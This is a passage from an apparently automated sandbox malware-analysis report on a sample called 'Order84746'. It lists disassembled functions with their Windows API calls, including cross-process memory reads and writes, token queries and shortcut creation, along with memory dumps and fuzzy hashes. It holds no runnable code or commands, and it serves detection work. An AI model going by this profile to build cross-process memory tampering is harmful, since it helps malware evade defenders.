                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                          • String ID:
                          • API String ID: 2664167353-0
                          • Opcode ID: a3391631dbcd0d3380fbe607b278fd93608709044e382eca4ca6a4bef946bcd5
                          • Instruction ID: 7327d43a87155dce9ec8d72b63f3b9ff792f29fb69a5ab74b2e55866f989f388
                          • Opcode Fuzzy Hash: a3391631dbcd0d3380fbe607b278fd93608709044e382eca4ca6a4bef946bcd5
                          • Instruction Fuzzy Hash: 76112633608346AFEB15AFE9DC45EAB7B9CEF85770B100429F928C61C1EB71D81187A0
                          Function 0091ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0091ABD7
                          • GetLastError.KERNEL32(?,0091A69F,?,?,?), ref: 0091ABE1
                          • GetProcessHeap.KERNEL32(00000008,?,?,0091A69F,?,?,?), ref: 0091ABF0
                          • RtlAllocateHeap.NTDLL(00000000,?,0091A69F), ref: 0091ABF7
                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0091AC0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 883493501-0
                          • Opcode ID: b45863706e4da023ef587f8e02248851d173cf353327f14f74599819fa3502bf
                          • Instruction ID: 442a8cd5b37426e216e981a78fc51fb402a3cdcc3d5ce9787ca7a9a01c8519a1
                          • Opcode Fuzzy Hash: b45863706e4da023ef587f8e02248851d173cf353327f14f74599819fa3502bf
                          • Instruction Fuzzy Hash: BB018C70716209BFDB104FAADC48DAB3BACEF8A354710042DF856C3260DAB1CC80DBA0
                          Function 00919ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                          Download Yara Rule
                          APIs
                          • CLSIDFromProgID.COMBASE ref: 00919ADC
                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00919AF7
                          • lstrcmpiW.KERNEL32(?,00000000), ref: 00919B05
                          • CoTaskMemFree.COMBASE(00000000), ref: 00919B15
                          • CLSIDFromString.COMBASE(?,?), ref: 00919B21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: b008c5f8549343f9cde8a0545110990f07d9402cdc17e30ca4522a8b4c60929b
                          • Instruction ID: 867be40207ce9d29fa1d03f9494264c40f2a6a8859cc0679417ffc1924fbed81
                          • Opcode Fuzzy Hash: b008c5f8549343f9cde8a0545110990f07d9402cdc17e30ca4522a8b4c60929b
                          • Instruction Fuzzy Hash: 1A018F76B15209BFDB104F54EC58B9A7AEDEF48395F144028F905D3210D7B0DD80ABA0
                          Function 00927A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927A74
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00927A82
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00927A8A
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00927A94
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: cf0ec771f75ab3312f9e4545f3e5f1983f3c1105fa6195e75725ea63f94de945
                          • Instruction ID: d2acef008b71915d2aef8f71c524439130a0646c83ea63a1155a9bf69ee1af52
                          • Opcode Fuzzy Hash: cf0ec771f75ab3312f9e4545f3e5f1983f3c1105fa6195e75725ea63f94de945
                          • Instruction Fuzzy Hash: AC016931D0A629EBDF04AFE5EC49ADDFB78FB09321F01044AE512B2154DB7096509BA1
                          Function 0091AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0091AADA
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0091AAE4
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091AAF3
                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0091AAFA
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091AB10
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 53a5a241ed957a0396a04a74147c0d7549d08315f24cfdabab94c751e206e137
                          • Instruction ID: d2f594f080f301bce7500ff44ad049af96a2727ac37a427e450ccf573fec3940
                          • Opcode Fuzzy Hash: 53a5a241ed957a0396a04a74147c0d7549d08315f24cfdabab94c751e206e137
                          • Instruction Fuzzy Hash: B2F0627175A2486FEB111FA5FC88EA73BADFF4A754F00002DF952C7190CAA19C45DB61
                          Function 0091AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0091AA79
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0091AA83
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0091AA92
                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0091AA99
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091AAAF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 3af4b2715a54b18184a7ce6ffebdee3357ca55fcf38703cd33dd2fea361009ad
                          • Instruction ID: 036c58bedcb094edb5728f5ab044e8ba7b896b7d3314fbb1fbcc2707f3576d6c
                          • Opcode Fuzzy Hash: 3af4b2715a54b18184a7ce6ffebdee3357ca55fcf38703cd33dd2fea361009ad
                          • Instruction Fuzzy Hash: 57F0AF3131A2086FEB101FA5AC88EB73BADFF4A754F00001DF911C7190DAA19C41DA61
                          Function 0091EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0091EC94
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0091ECAB
                          • MessageBeep.USER32(00000000), ref: 0091ECC3
                          • KillTimer.USER32(?,0000040A), ref: 0091ECDF
                          • EndDialog.USER32(?,00000001), ref: 0091ECF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: b91110096f0c6ff25a74d8e9c97c5c058ebc81c5bf48be3e6aea1bcb81de59c3
                          • Instruction ID: c99f94b8fe270e28f4f60961d74eb976116ba75d943ac381d4b0cc43298542bd
                          • Opcode Fuzzy Hash: b91110096f0c6ff25a74d8e9c97c5c058ebc81c5bf48be3e6aea1bcb81de59c3
                          • Instruction Fuzzy Hash: 1E016D30A14719ABEB245B10DE4EBD67BB8FB10705F00055DF9A3A14E0DBF4AA849BC1
                          Function 008FB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • EndPath.GDI32(?), ref: 008FB0BA
                          • StrokeAndFillPath.GDI32(?,?,0095E680,00000000,?,?,?), ref: 008FB0D6
                          • SelectObject.GDI32(?,00000000), ref: 008FB0E9
                          • DeleteObject.GDI32 ref: 008FB0FC
                          • StrokePath.GDI32(?), ref: 008FB117
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 43f730b8b04f19c6c3b804df3495bfc25ee87c9f395f8243fc5be1953faae23c
                          • Instruction ID: c89ed6f311e93267adefc9be896f2003581d7c369d28d17f9a4c4e1e64ddb981
                          • Opcode Fuzzy Hash: 43f730b8b04f19c6c3b804df3495bfc25ee87c9f395f8243fc5be1953faae23c
                          • Instruction Fuzzy Hash: A7F01934129648EFCB219F65EC0C7643B64FB123A6F088318E525C40F0CB7089A6EF90
                          Function 0092F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0092F2DA
                          • CoCreateInstance.COMBASE(0096DA7C,00000000,00000001,0096D8EC,?), ref: 0092F2F2
                          • CoUninitialize.COMBASE ref: 0092F555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize
                          • String ID: .lnk
                          • API String ID: 948891078-24824748
                          • Opcode ID: c32cf46d56157bfcd71e9651f9dfcbf6a487892a81babbb63ed24d0395250ba2
                          • Instruction ID: 3eba4fc88dcfaa63fb179088b375c0a06745c0dbf555b78e2c7e2e83a08d429b
                          • Opcode Fuzzy Hash: c32cf46d56157bfcd71e9651f9dfcbf6a487892a81babbb63ed24d0395250ba2
                          • Instruction Fuzzy Hash: 91A12B71604205AFD300EF68C891EABB7A8FF99714F40491DF595D7192DBB0EA09CB62
                          Function 0092E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E53B1,?,?,008E61FF,?,00000000,00000001,00000000), ref: 008E662F
                          • CoInitialize.OLE32(00000000), ref: 0092E85D
                          • CoCreateInstance.COMBASE(0096DA7C,00000000,00000001,0096D8EC,?), ref: 0092E876
                          • CoUninitialize.COMBASE ref: 0092E893
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                          • String ID: .lnk
                          • API String ID: 2126378814-24824748
                          • Opcode ID: ce62ab6c4912027626f8d066074aef925a316bed4f29a2d8dbd59a17a0e3ed7d
                          • Instruction ID: fa9ce18edbe6e43c2e0f76764000927ce4968d8b2a4a2b4c598ce2f6fece2f62
                          • Opcode Fuzzy Hash: ce62ab6c4912027626f8d066074aef925a316bed4f29a2d8dbd59a17a0e3ed7d
                          • Instruction Fuzzy Hash: 43A146356043119FCB14DF29C484D2ABBE9FF89314F148949F9A69B3A2CB31EC45CB92
                          Function 0090325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 009032ED
                            • Part of subcall function 0090E0D0: __87except.LIBCMT ref: 0090E10B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorHandling__87except__start
                          • String ID: pow
                          • API String ID: 2905807303-2276729525
                          • Opcode ID: d626f8a2301b31244b49062b1ccc7842ffce3a8f537445b3b44e2bba322d03a5
                          • Instruction ID: 7f9be25ab55b2d7a9b50aa643b25920697223145204609924ec33c2a4d9e4ca3
                          • Opcode Fuzzy Hash: d626f8a2301b31244b49062b1ccc7842ffce3a8f537445b3b44e2bba322d03a5
                          • Instruction Fuzzy Hash: 6B514C32A1C2019ECB15B718C98137A2BDCDB81710F64CD69F4E5861E9DF388DD4A646
                          Function 00924606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0097DC50,?,0000000F,0000000C,00000016,0097DC50,?), ref: 00924645
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009246C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharUpper$__itow__swprintf
                          • String ID: REMOVE$THIS
                          • API String ID: 3797816924-776492005
                          • Opcode ID: d6c5fb5b640973d1dc9f62a7ca3395b7e68517bc440ac133485f29dd3d603ae3
                          • Instruction ID: 71ed73ea28bf4e8a8d9e8710e2f0bb53f2c156998d18c6a0be663ad29635ef02
                          • Opcode Fuzzy Hash: d6c5fb5b640973d1dc9f62a7ca3395b7e68517bc440ac133485f29dd3d603ae3
                          • Instruction Fuzzy Hash: A641E530A002699FCF00EF69D881AAEB7B8FF46304F048059E926AB356D734DC45CB51
                          Function 0091C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0091BC08,?,?,00000034,00000800,?,00000034), ref: 00924335
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0091C1D3
                            • Part of subcall function 009242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0091BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00924300
                            • Part of subcall function 0092422F: GetWindowThreadProcessId.USER32(?,?), ref: 0092425A
                            • Part of subcall function 0092422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0091BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0092426A
                            • Part of subcall function 0092422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0091BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00924280
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0091C240
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0091C28D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: 4ac1d5534a357392d5d88547530c95101f62bad27cee5b1180407422c45aa5f0
                          • Instruction ID: 1d273ac27f7737b0be86725fa8fb369554ad4a141f12b0a00e4a4220cf78e8a5
                          • Opcode Fuzzy Hash: 4ac1d5534a357392d5d88547530c95101f62bad27cee5b1180407422c45aa5f0
                          • Instruction Fuzzy Hash: 04413B72A0022CAFDB10DBA4DD81BEEB778AB49700F004495FA55B7181DA71AE85CB61
                          Function 0094A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097DC00,00000000,?,?,?,?), ref: 0094A6D8
                          • GetWindowLongW.USER32 ref: 0094A6F5
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0094A705
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: 040f11d6456b3c8d7bfd64ed282601aacef848370ab8a08a954edf33973111ca
                          • Instruction ID: 99f7391659b970ba03671322f79a44f99f4651a5e65eb09d53bebab0ce08914e
                          • Opcode Fuzzy Hash: 040f11d6456b3c8d7bfd64ed282601aacef848370ab8a08a954edf33973111ca
                          • Instruction Fuzzy Hash: 2331CD31645209AFDB218E38CC41FEA77A9FB49328F254719F975D22E0D770A8509B91
                          Function 0094A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0094A15E
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0094A172
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0094A196
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
